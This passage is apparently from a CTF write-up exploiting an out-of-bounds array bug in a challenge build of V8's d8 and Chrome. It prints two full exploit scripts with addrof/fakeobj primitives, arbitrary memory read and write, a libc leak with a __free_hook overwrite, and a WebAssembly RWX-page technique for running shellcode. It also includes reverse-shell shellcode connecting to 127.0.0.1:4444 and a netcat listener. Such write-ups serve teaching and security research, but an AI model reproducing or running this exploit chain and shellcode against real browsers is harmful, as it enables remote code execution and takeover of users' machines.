0x55555631a2f0:	0x0000000000001000	0x0000000000000021
[...]

The vmmap output for this specific run shows a binary base of 0x555555554000 and a heap base of 0x5555562f9000. This makes the first value a binary address! Checking it across a few runs, it sits at a consistent offset from the binary base. We're also gonna swap our exploit over to use the second heap address we spotted in the map region:

let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));

let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));
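
The offsets in that snippet all come from subtracting the vmmap bases from the leaked values. As a sketch, using the addresses from the GDB session above (offsetFrom is a hypothetical helper):

```javascript
// hypothetical helper: distance of a leaked address from a known base
function offsetFrom(base, leak) {
    if (leak < base) throw new RangeError("leak is below base");
    return leak - base;
}

// bases from vmmap, leaks from the x/200gx and x/10gx dumps above
const heapBaseSeen = 0x5555562f9000n;
const binaryBaseSeen = 0x555555554000n;

console.log("0x" + offsetFrom(heapBaseSeen, 0x5555563a7f60n).toString(16));   // 0xaef60
console.log("0x" + offsetFrom(heapBaseSeen, 0x55555631a2e0n).toString(16));   // 0x212e0
console.log("0x" + offsetFrom(binaryBaseSeen, 0x5555562dbea8n).toString(16)); // 0xd87ea8
```

These are specific to this build of d8, so if you build it yourself the numbers will most likely differ and need recalculating the same way.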

Now we just have to work out the GOT offset and read the entry to find libc base!

readelf -a d8 | grep -i read
[...]
000000d9a4c0  003d00000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
[...]

So the GOT entry is an offset of 0xd9a4c0 from base. Easy leak:

let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));

Then we just need to get system and free_hook offsets, and we are good to go. Pretty easy from inside GDB:

gef➤  p &system
$1 = (int (*)(const char *)) 0x7ffff7054420 <__libc_system>
gef➤  p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff73f28e8 <__free_hook>

With base 0x7ffff7005000, the offsets are easy to calculate:

// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;

And we can overwrite free hook and pop a calculator:

console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");

It does, in fact, work!

Full Exploit

// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // place desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will return the arbitrary read value
    return ftoi(fake[0]);
}

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write address to backing store
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}

// exploit
// leaks
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16));
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16));

let map_reg_start = ftoi(map_float) - 0x2ed9n;
console.log("[+] Map Region Start: 0x" + map_reg_start.toString(16));

let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));

let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));

let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));

// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;

console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");

Unfortunately, as Faith recognised in their article, when running the exploit on the Chrome binary itself (the actual browser provided with the challenge!) the __free_hook route does not work. It's likely due to a different memory layout as a result of different processes running, so the leaks are not the same and the offsets are broken. Debugging would be nice, but it's very hard with the given binary. Instead we can use another classic approach and abuse WebAssembly to create a RWX page for our shellcode.

Abusing WebAssembly

This approach is even better because it will (theoretically) work on any operating system and does not rely on the presence of libc and __free_hook, as it allows us to run our own shellcode. I'm gonna save this in exploit2.js.

If we create a function in WebAssembly, it will create an RWX page that we can leak. The WASM code itself is not important; we only care about the RWX page. To that effect I'll use the WASM used by Faith, because the website wasmfiddle has been closed down and I cannot for the life of me find an alternative. Let me know if you do.

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

We can see that this creates an RWX page:

gef➤  vmmap
[...]
0x000035d2131ff000 0x000035d21b141000 0x0000000000000000 --- 
0x0000396a8d0b5000 0x0000396a8d0b6000 0x0000000000000000 rwx 
0x0000396a8d0b6000 0x0000396acd0b5000 0x0000000000000000 ---
[...]
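As a quick sanity check on those bytes, the sketch below loads the same module outside of any exploit context, for example in d8 or Node. The names bytes, magic, version and instance are mine, not Faith's. It only shows that the module is valid and that main is a trivial function (the trailing 65, 42, 11 is `i32.const 42; end`), which is why its contents don't matter to us.

```javascript
// Same bytes as wasm_code above; nothing here touches V8 internals.
const bytes = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

// Bytes 0..3 are the "\0asm" magic, bytes 4..7 the version (little endian).
const magic = String.fromCharCode(...bytes.slice(1, 4));
const version = new DataView(bytes.buffer).getUint32(4, true);
console.log(magic, version); // asm 1

// The engine accepts the module...
console.log(WebAssembly.validate(bytes)); // true

// ...and the single exported function simply returns a constant.
const instance = new WebAssembly.Instance(new WebAssembly.Module(bytes));
console.log(instance.exports.main()); // 42
```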

If we leak the addresses of wasm_mod, wasm_instance and f, none of them are actually located in the RWX page, so we can't simply addrof() and apply a constant offset. Instead, we're gonna comb memory for all references to the RWX page. The WASM objects likely need some sort of reference to it, so it's possible a pointer is stored nearby in memory.

console.log("[+] WASM Mod at 0x" + addrof(wasm_mod).toString(16));
console.log("[+] WASM Instance at 0x" + addrof(wasm_instance).toString(16));
console.log("[+] F at 0x" + addrof(f).toString(16));

gef➤  run --allow-natives-syntax --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x22322b10f919
[+] WASM Mod at 0x22322b10fcc9
[+] WASM Instance at 0x45c390e13a1
[+] F at 0x45c390e1599
V8 version 7.5.0 (candidate)
d8> ^C
gef➤  vmmap
[...]
0x0000311254159000 0x000031125415a000 0x0000000000000000 rwx
[...]
gef➤  search-pattern 0x0000311254159000
[+] Searching '\x00\x90\x15\x54\x12\x31\x00\x00' in memory
[+] In (0x45c390c0000-0x45c39100000), permission=rw-
  0x45c390e1428 - 0x45c390e1448  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
[+] In '[heap]'(0x5555562f9000-0x5555563c6000), permission=rw-
  0x5555563a1e38 - 0x5555563a1e58  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563acfe0 - 0x5555563ad000  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563ad000 - 0x5555563ad020  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]" 
  0x5555563ad120 - 0x5555563ad140  →   "\x00\x90\x15\x54\x12\x31\x00\x00[...]"

The last four are in the heap, so unlikely, but the first instance is near wasm_instance and f. The offset between wasm_instance and that address appears to be 0x87. In reality it is 0x88 (remember pointer tagging!), but that works for us.
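The arithmetic behind those two numbers can be checked with the addresses from the gdb session above. This is only a worked calculation; the constant names are made up for illustration.

```javascript
// Values copied from the gdb output above.
const instanceTagged = 0x45c390e13a1n; // what addrof(wasm_instance) printed (tagged, so odd)
const pointerSlot    = 0x45c390e1428n; // first search-pattern hit

// V8 marks heap object pointers by setting the lowest bit.
const instanceRaw = instanceTagged - 1n;

console.log("0x" + (pointerSlot - instanceTagged).toString(16)); // 0x87
console.log("0x" + (pointerSlot - instanceRaw).toString(16));    // 0x88

// addrof() hands back the tagged value, so adding 0x87 lands exactly on the slot.
// arb_read() then sees an even address and re-tags it before using it.
console.log(instanceTagged + 0x87n === pointerSlot); // true
```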

let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

It spits out the right base, which is great. Now we just want to get shellcode for popping calculator as well as a method for copying the shellcode there. I'm gonna just (once again) shamelessly nab Faith's implementations for that, which are fairly self-explanatory.

function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    // this is similar to the arb_write() function
    // but we have to redo it because we want to write way more than 8 bytes
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;
    initial_arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
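To see what the little-endian flag in setUint32 does to these dwords, here is a small sketch that writes the first four of them into an ordinary ArrayBuffer (standing in for the RWX page) and dumps the resulting bytes. The names head, page and hex are mine.

```javascript
// First four dwords of the shellcode array above.
const head = [0x90909090, 0x90909090, 0x782fb848, 0x636c6163];

// A plain ArrayBuffer plays the role of the RWX page here.
const page = new ArrayBuffer(head.length * 4);
const view = new DataView(page);
head.forEach((dword, i) => view.setUint32(4 * i, dword, true));

// Dump the bytes in the order they sit in memory.
const bytes = new Uint8Array(page);
const hex = Array.from(bytes, b => b.toString(16).padStart(2, "0")).join(" ");
console.log(hex);
// 90 90 90 90 90 90 90 90 48 b8 2f 78 63 61 6c 63

// `48 b8` is mov rax, imm64; the immediate that follows starts with the path.
console.log(String.fromCharCode(...bytes.slice(10, 16))); // /xcalc
```

Each dword is stored lowest byte first, so the array reads "backwards" compared to the instruction stream. The whole array is 21 dwords (84 bytes), comfortably inside the 0x100-byte buffer used by copy_shellcode.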

And then we just copy it over and pop a calculator:

console.log("[+] Copying Shellcode...");

copy_shellcode(rwx_base, shellcode);

console.log("[+] Running Shellcode...");

f();

Running this under GDB causes it to crash for me, but running it in bash works fine:

$ ./d8 --shell exploit2.js 
[+] Address of Arbitrary RW Array: 0x19b85504fea1
[+] WASM Instance at 0x189e40ca1761
[+] RWX Region located at 0x29686af10000
[+] Copying Shellcode...
[+] Running Shellcode...
Warning: Cannot convert string "-adobe-symbol-*-*-*-*-*-120-*-*-*-*-*-*" to type FontStruct

With a calculator popped!

Full Exploit

// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // placed desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will return the arbitrary read value
    return ftoi(fake[0]);
}

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write the target address into the backing store pointer
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}

// wasm exploit
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

console.log("[+] WASM Instance at 0x" + (addrof(wasm_instance)).toString(16));

// leak RWX base
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

// shellcode time
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;
    initial_arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];

// pop it
console.log("[+] Copying Shellcode...");

copy_shellcode(rwx_base, shellcode);

console.log("[+] Running Shellcode...");

f();

Popping it on Chrome

Create an index.html with the following code:

<html>
  <head>
    <script src="exploit2.js"></script>
  </head>
</html>

Make sure exploit2.js is in the same folder. Then load the index.html with the version of Chrome bundled in the challenge:

$ ./chrome --no-sandbox ../../index.html

And it pops calculator! You can also place it in another folder and use Python's SimpleHTTPServer to serve it and connect that way - it works either way.

Getting a Reverse Shell instead

Well, we are hackers, we like the idea of a reverse shell, no? Plus it makes you feel way cooler to be able to do that.

We can grab the reverse shell code from here and modify it slightly so that it connects back to the loopback address 127.0.0.1:

var shellcode = [0x6a58296a, 0x016a5f02, 0x050f995e, 0x68525f50, 0x0100007f, 0x5c116866, 0x6a026a66, 0x5e54582a, 0x0f5a106a, 0x5e026a05, 0x0f58216a, 0xceff4805, 0x016af679, 0x50b94958, 0x77737361, 0x41203a64, 0x6a5e5451, 0x050f5a08, 0x48c03148, 0x0f08c683, 0x31b84805, 0x35343332, 0x56383736, 0x75af485f, 0x583b6a1a, 0xbb485299, 0x6e69622f, 0x68732f2f, 0x525f5453, 0x54575a54, 0x90050f5e];

Listening with nc -nvlp 4444, we get the prompt for a password, which is 12345678. Input that, and bingo! It even works on the Chrome instance!
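If you want to confirm where the address and port live before changing them, the sketch below lays out the first six dwords of the array above (as numeric literals) in an ordinary ArrayBuffer and reads the two fields back. The byte offsets are my reading of this particular shellcode, and the names head, ip and port are just for illustration.

```javascript
// Dwords 0..5 of the reverse shell array above.
const head = [0x6a58296a, 0x016a5f02, 0x050f995e, 0x68525f50, 0x0100007f, 0x5c116866];

const buf = new ArrayBuffer(head.length * 4);
const view = new DataView(buf);
head.forEach((dword, i) => view.setUint32(4 * i, dword, true));

// Byte 15 is 0x68 (push imm32); bytes 16..19 are its operand, the IPv4 address.
const ip = Array.from(new Uint8Array(buf, 16, 4)).join(".");

// Bytes 20..21 are `66 68` (push imm16); bytes 22..23 hold the port in network byte order.
const port = view.getUint16(22, false);

console.log(ip, port); // 127.0.0.1 4444
```

The port is stored big endian inside a little-endian dword, which is why 4444 (0x115c) shows up as 0x5c11 in the array.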

Final Thoughts

First off, give Faith a follow, they deserve it.

Secondly, WASM makes no sense to me, but oh well. Sounds like a security nightmare.